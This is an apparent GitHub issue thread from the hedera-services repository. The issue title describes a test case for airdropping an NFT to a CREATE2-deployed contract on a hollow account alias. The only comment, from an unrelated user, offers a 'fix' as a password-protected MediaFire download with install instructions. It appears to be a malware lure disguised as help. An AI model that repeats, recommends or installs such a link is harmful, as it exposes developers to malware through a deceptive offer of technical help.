### ISSUE TITLE
(AIRDROP_TO_CONTRACT_10) EOA account airdrops a single token to an contract, deployed via CREATE2 on a hollow account addres alias (the contract won’t have any free auto association slots) for NFT

### ISSUE THREAD

**Issue by vtronkov** [hashgraph/hedera-services#15278]

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
